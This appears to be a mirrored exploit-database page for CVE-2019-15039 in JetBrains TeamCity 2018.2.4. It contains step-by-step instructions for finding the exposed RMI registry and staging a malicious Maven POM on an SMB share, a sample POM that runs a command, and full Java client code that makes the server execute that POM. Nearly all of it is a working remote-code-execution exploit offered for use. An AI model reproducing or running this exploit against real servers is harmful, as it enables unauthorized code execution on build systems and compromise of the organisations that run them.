扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 |
# Exploit Title: JetBrains TeamCity 2018.2.4 - Remote Code Execution # Date: 2020-01-07 # Exploit Author: Harrison Neal # Vendor Homepage: https://www.jetbrains.com/ # Software Link: https://confluence.jetbrains.com/display/TW/Previous+Releases+Downloads # Version: 2018.2.4 for Windows # CVE: CVE-2019-15039 # You'll need a few .jars from a copy of TeamCity to compile and run this code # To compile, file path should match ${package}/${class}.java, e.g., # com/whatdidibreak/teamcity_expl/Main.java # Instructions for Windows (easier case): # 1) Verify exploitability. #1a) Verify the remote host is running Windows, e.g. checking for common #running services and their versions. #1b) Discover Java RMI services on the remote host, e.g. doing a 65k port #scan using nmap and the rmi-dumpregistry script. On one port, there #should be a registry with an object named teamcity-mavenServer. This #object should point to a second open port that is also identified as #Java RMI. # 2) Prepare the payload. #2a) There needs to be an SMB share that the TeamCity software can read from #and that you can write to. You might establish a share on your own #system and make it accessible to anonymous users. Alternatively, if the #TeamCity server is domain-joined, you might find a pre-existing share #elsewhere in the domain. #2b) Place a malicious POM in that share, e.g. <project> <modelVersion>4.0.0</modelVersion> <groupId>com.mycompany.app</groupId> <artifactId>my-module</artifactId> <version>1</version> <build> <plugins> <plugin> <groupId>org.codehaus.mojo</groupId> <artifactId>exec-maven-plugin</artifactId> <version>1.1.1</version> <executions> <execution> <goals> <goal>exec</goal> </goals> </execution> </executions> <configuration> <executable>calc</executable> <arguments> <argument>-testarg</argument> </arguments> </configuration> </plugin> </plugins> </build> </project> # 3) Run this exploit. #Argument #1: TeamCity host (IP or FQDN) #Argument #2: Port of RMI Registry (the first open port described above) #Argument #3: UNC path to the malicious POM file (e.g., \\ip\share\pom.xml) #Argument #4: POM goal (e.g., exec:exec) # NOTE: It is possible to exploit this issue in other situations, e.g. if the # TeamCity server is running on a *nix system that allows access to some local # directory over NFS. */ package com.whatdidibreak.teamcity_expl; import java.io.File; import java.io.IOException; import java.net.InetSocketAddress; import java.net.ServerSocket; import java.net.Socket; import java.rmi.registry.LocateRegistry; import java.rmi.registry.Registry; import java.rmi.server.RMISocketFactory; import java.util.ArrayList; import java.util.List; import jetbrains.buildServer.maven.remote.MavenServer; import jetbrains.buildServer.maven.remote.RemoteEmbedder; import org.jetbrains.maven.embedder.MavenEmbedderSettings; import org.jetbrains.maven.embedder.MavenExecutionResult; public class Main { public static void main(String[] args) throws Throwable { String host = args[0]; int port = Integer.parseInt(args[1]); String pomPath = args[2]; String goal = args[3]; // The exported object may point to a different host than what we're // using to connect to the registry, which could break things, i.e., // - localhost // - for a multi-homed target, an IP we can't connect to // - a FQDN or hostname we can't resolve // - etc. // For this reason, we'll set up a socket factory that forces all // connections to go to the host specified by the user, ignoring the // host pointed to by the exported object. OverrideHostSocketFactory sf = new OverrideHostSocketFactory(host); RMISocketFactory.setSocketFactory(sf); // The rest of the code in this method should look fairly typical for // interacting with remote objects using RMI. Registry r = LocateRegistry.getRegistry(host, port, sf); MavenServer ms = (MavenServer) r.lookup("teamcity-mavenServer"); MavenEmbedderSettings mes = new MavenEmbedderSettings(); RemoteEmbedder re = ms.exportEmbedder(mes); File f = new File(pomPath); List ap = new ArrayList(); List g = new ArrayList(); g.add(goal); MavenExecutionResult mer = re.execute(f, ap, g); } private static class OverrideHostSocketFactory extends RMISocketFactory { private String targetHost; public OverrideHostSocketFactory(String targetHost) { this.targetHost = targetHost; } @Override public Socket createSocket(String host, int port) throws IOException { Socket toReturn = new Socket(); toReturn.connect(new InetSocketAddress(targetHost, port)); return toReturn; } @Override public ServerSocket createServerSocket(int port) throws IOException { throw new UnsupportedOperationException("Not supported yet."); } } } |
体验盒子
